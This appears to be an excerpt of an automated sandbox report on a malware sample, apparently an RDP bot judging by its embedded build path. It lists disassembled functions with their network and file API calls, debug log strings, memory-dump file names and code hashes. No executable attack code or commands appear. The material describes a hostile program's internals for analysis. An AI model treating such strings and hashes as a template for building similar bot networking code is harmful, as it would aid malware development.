Strings

[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126E2FED
tcp_send, xrefs: 00007FFE126E2FE6, 00007FFE126E3017
tcp_recv, xrefs: 00007FFE126E3037
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE126E303E
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE126E301E

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: 094feadf84d9ca9e3155364a1ba31a33ab06d9b2b76804d2299b6ea95532df59
Instruction ID: 2d2f4e230c17af244990d60e41d8ede3ff89d14ef05d63117f60b92790b3a919
Opcode Fuzzy Hash: 094feadf84d9ca9e3155364a1ba31a33ab06d9b2b76804d2299b6ea95532df59
Instruction Fuzzy Hash: F2210211F18D8385FA208B27ADA06B81642BF057F4F5403B0EC3C476FAEEADA545C304

Function 00007FFE1A521CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFE1A521D0B
WSAGetLastError.WS2_32 ref: 00007FFE1A521D1A

Strings

[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFE1A521D5E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE1A521D2D
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE1A521D7E
tcp_send, xrefs: 00007FFE1A521D26, 00007FFE1A521D57
tcp_recv, xrefs: 00007FFE1A521D77

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: 9494e14ce3a27552937ae465d96f20451ee6982272dea73166048f5b9e9b3018
Instruction ID: be9ce5f5256e94b605e00c3e4bb5368d6f87b2223661b4158f46cc57bb5fd12f
Opcode Fuzzy Hash: 9494e14ce3a27552937ae465d96f20451ee6982272dea73166048f5b9e9b3018
Instruction Fuzzy Hash: 85216F69B1CE52C1EA204B67A9806BA26527F57FF5F5403F3DC2D4B6F2DE2CA5458300

Function 00007FFE11BDABF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11BDAC1C
setsockopt.WS2_32 ref: 00007FFE11BDAC48
WSAGetLastError.WS2_32 ref: 00007FFE11BDAC5F
WSAGetLastError.WS2_32 ref: 00007FFE11BDAC84

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11BDAC9B
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11BDAC76
tcp_set_timeo, xrefs: 00007FFE11BDAC6F, 00007FFE11BDAC94

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 3ba9905c85f0b21fd7e894e96f07bcb23402eeca7c15dd9aa80b4b2fa724bb98
Instruction ID: 88c1f4ac3ab5aac6b851bf4702eecee65f1a4c20e45b94b3386e9183d968b24d
Opcode Fuzzy Hash: 3ba9905c85f0b21fd7e894e96f07bcb23402eeca7c15dd9aa80b4b2fa724bb98
Instruction Fuzzy Hash: 7E116A71A1D942D6E7349F27A8008B9A658EF88774F105275E96E836B4DF7CD509CB00

Function 00007FFE1A4F3ED4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1A4F3EFC
setsockopt.WS2_32 ref: 00007FFE1A4F3F28
WSAGetLastError.WS2_32 ref: 00007FFE1A4F3F3F
WSAGetLastError.WS2_32 ref: 00007FFE1A4F3F64

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A4F3F56
tcp_set_timeo, xrefs: 00007FFE1A4F3F4F, 00007FFE1A4F3F74
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A4F3F7B

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 7898d053efd30122f79762812fd161f8bd09f82c0285f26850430d40275440a0
Instruction ID: 5acc28f594b6c352ad009e451106d8846aaff561a7e9ad0e739aeef4233e2419
Opcode Fuzzy Hash: 7898d053efd30122f79762812fd161f8bd09f82c0285f26850430d40275440a0
Instruction Fuzzy Hash: 6F11967171CE4286F3209B2BA8040BA6660AF89F74F1056B7ED6D836B4DF7CD50A8B00

Function 00007FFE126E2604 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE126E262C
setsockopt.WS2_32 ref: 00007FFE126E2658
WSAGetLastError.WS2_32 ref: 00007FFE126E266F
WSAGetLastError.WS2_32 ref: 00007FFE126E2694

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126E26AB
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE126E2686
tcp_set_timeo, xrefs: 00007FFE126E267F, 00007FFE126E26A4

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 6ea6309f8952398e634868d392235a12f819b08b8aad9c59136ce9d2e99d613f
Instruction ID: 5c80e1d7922338de2872fcc16766a4d2be12b818cec0b2e701f4f87dd99b6935
Opcode Fuzzy Hash: 6ea6309f8952398e634868d392235a12f819b08b8aad9c59136ce9d2e99d613f
Instruction Fuzzy Hash: E1116371A189424AE710AB17EC504A56761EF88764F204375E96E83AF8EFFCD909CB04

Function 00007FFE1A521344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1A52136C
setsockopt.WS2_32 ref: 00007FFE1A521398
WSAGetLastError.WS2_32 ref: 00007FFE1A5213AF
WSAGetLastError.WS2_32 ref: 00007FFE1A5213D4

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A5213EB
tcp_set_timeo, xrefs: 00007FFE1A5213BF, 00007FFE1A5213E4
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE1A5213C6

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: d75a270e90b185d077b1882f88bf5ddc0587005d39dfd19ed2511a7d17e5abdd
Instruction ID: af825ede857ea6450fc621586820f7c396fcd57002ed94fc56167ef69a5dc5c0
Opcode Fuzzy Hash: d75a270e90b185d077b1882f88bf5ddc0587005d39dfd19ed2511a7d17e5abdd
Instruction Fuzzy Hash: C7115175B0CA4296F3209B57F40017A6661BF9AB74F2042B7E96D87AB4DF7CD5098B00

Function 00007FFE11505624 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1150564C
setsockopt.WS2_32 ref: 00007FFE11505678
WSAGetLastError.WS2_32 ref: 00007FFE1150568F
WSAGetLastError.WS2_32 ref: 00007FFE115056B4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115056A6
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE115056CB
tcp_set_timeo, xrefs: 00007FFE1150569F, 00007FFE115056C4

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: d543737f11dd21b1b477dccb31d85866533beeb0c3f258185a6ae76c08a64724
Instruction ID: 1ac662a3233e566a3776c4093e53456afac0bcefe206ce85218e3a0a5858849e
Opcode Fuzzy Hash: d543737f11dd21b1b477dccb31d85866533beeb0c3f258185a6ae76c08a64724
Instruction Fuzzy Hash: C411C871B18D4286F350AB57F80007A6665EF88774F104275EA6E83BB5DFBCD549CB00

Function 00007FFE11EC1CE4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE11EC1D0C
setsockopt.WS2_32 ref: 00007FFE11EC1D38
WSAGetLastError.WS2_32 ref: 00007FFE11EC1D4F
WSAGetLastError.WS2_32 ref: 00007FFE11EC1D74

Strings

tcp_set_timeo, xrefs: 00007FFE11EC1D5F, 00007FFE11EC1D84
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC1D66
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC1D8B

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 965785d7ab7d92e0704bde05fb8876d09001233a2ee5dad71bbbf6162b0393d8
Instruction ID: f7283f629b7c5daacf95ceda7177fd133839d824f97f78351d3dad6f755dc1cd
Opcode Fuzzy Hash: 965785d7ab7d92e0704bde05fb8876d09001233a2ee5dad71bbbf6162b0393d8
Instruction Fuzzy Hash: 7011B671A1C94286E710AB9BEC00567AAA4FF887A4F505271EA6D837F4DF7CD5068B01

Function 00007FFE126E33CF Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3401
GetProcessHeap.KERNEL32 ref: 00007FFE126E340C
HeapFree.KERNEL32 ref: 00007FFE126E341D
EnterCriticalSection.KERNEL32 ref: 00007FFE126E3441
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3464
EnterCriticalSection.KERNEL32 ref: 00007FFE126E34D1

Strings

[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE126E34BE
routine_tx, xrefs: 00007FFE126E34B7

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: CriticalSection$EnterHeapLeave$FreeProcess
String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 2539320189-3555278722
Opcode ID: 2b663758171c4e92e9570753953ef0af31ed0ceed0f3b414d587b6583ec3f0d2
Instruction ID: f63239d53df6302601dff8d89a96f400b6e015790980b8dbc430ac066f5fc7c2
Opcode Fuzzy Hash: 2b663758171c4e92e9570753953ef0af31ed0ceed0f3b414d587b6583ec3f0d2
Instruction Fuzzy Hash: FF310635A08E5282EB21CF13EC906B973A0EF48BA0F1441B5CA5E47AF4DFBCE9518744

Function 00007FFE1A52C415 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 127sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FFE1A52C448
Sleep.KERNEL32 ref: 00007FFE1A52C4C4

Strings

[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u), xrefs: 00007FFE1A52C547
routine_rx, xrefs: 00007FFE1A52C540, 00007FFE1A52C572
/, xrefs: 00007FFE1A52C5A7
[W] (%s) -> Not a valid packet received(size=%u,suid=%llx), xrefs: 00007FFE1A52C579

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: Sleep
String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
API String ID: 3472027048-1600310168
Opcode ID: 76f63b9c4d32c1da9ed52c17c6667bf174d282640c69c228af9d6623c514ec68
Instruction ID: c6ff08a037460a38fa4d5dd4a58e11044f30583a979916060f33db3109887c30
Opcode Fuzzy Hash: 76f63b9c4d32c1da9ed52c17c6667bf174d282640c69c228af9d6623c514ec68
Instruction Fuzzy Hash: 00513E21F0CE43C5FA208BD7A4403BA2262AF96FB9F5042F7D85E466F6DE6CE4458741

Function 00007FF7C1AB6E87 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB1425), ref: 00007FF7C1AB6E90
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF7C1AB1425), ref: 00007FF7C1AB6ED5

Strings

(path != NULL), xrefs: 00007FF7C1AB6EB4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB6EC2
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB6EAD
fs_path_exists, xrefs: 00007FF7C1AB6EBB

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 9fef411c49d08bf23692d8efbd1792ddd3cc6b80d54de3a2e0922cbe23a56c42
Instruction ID: d9fb568e7357cdff8187b1a936c06c3d03c2d43cb0a090e3ba9c605e1e880dc9
Opcode Fuzzy Hash: 9fef411c49d08bf23692d8efbd1792ddd3cc6b80d54de3a2e0922cbe23a56c42
Instruction Fuzzy Hash: 2D21A3B0E1C5C382FB60AE689494B7DD1525F40369FE44533E80E8B6E0CE9DF8869262

Function 00007FFE1A5256C7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE1A5256D0
GetLastError.KERNEL32 ref: 00007FFE1A525715

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1A5256ED
(path != NULL), xrefs: 00007FFE1A5256F4
fs_path_exists, xrefs: 00007FFE1A5256FB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1A525702

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 97c17c4cf84dc7a2fcad4bebec9ba3579fbf900d4b77be3971ef5b5e49f30029
Instruction ID: f4950cf95624ddd5995d9556e6d80c86bad95574abaa6ddf6bbcc7234e4ba1a0
Opcode Fuzzy Hash: 97c17c4cf84dc7a2fcad4bebec9ba3579fbf900d4b77be3971ef5b5e49f30029
Instruction Fuzzy Hash: 8B21D610F0DD43C2FB244AEA954477922429F12BBDFA445F3D50F8A1B0DE1CB8859642

Function 00007FFE11EC82D7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE11EC82E0
GetLastError.KERNEL32 ref: 00007FFE11EC8325

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC8312
fs_path_exists, xrefs: 00007FFE11EC830B
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11EC82FD
(path != NULL), xrefs: 00007FFE11EC8304

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 5791759264d75a3a417900a43a506217477ce90d88af35a370718004647d8d75
Instruction ID: bdbfcf5ee682757445da6942159dfe1d88cd1ab64e0e33dc45ea36ca3933022f
Opcode Fuzzy Hash: 5791759264d75a3a417900a43a506217477ce90d88af35a370718004647d8d75
Instruction Fuzzy Hash: 6621E770E0CC9382FB2446DAAE48B7F91599F02735FA465B2E40E8A1F1CF5CFC859246

Function 00007FFE11BDB4BA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11BDB4E2
WSAGetLastError.WS2_32 ref: 00007FFE11BDB4FC

Strings

[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11BDB51D
tcp_recv, xrefs: 00007FFE11BDB516, 00007FFE11BDB52E, 00007FFE11BDB553
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11BDB55A
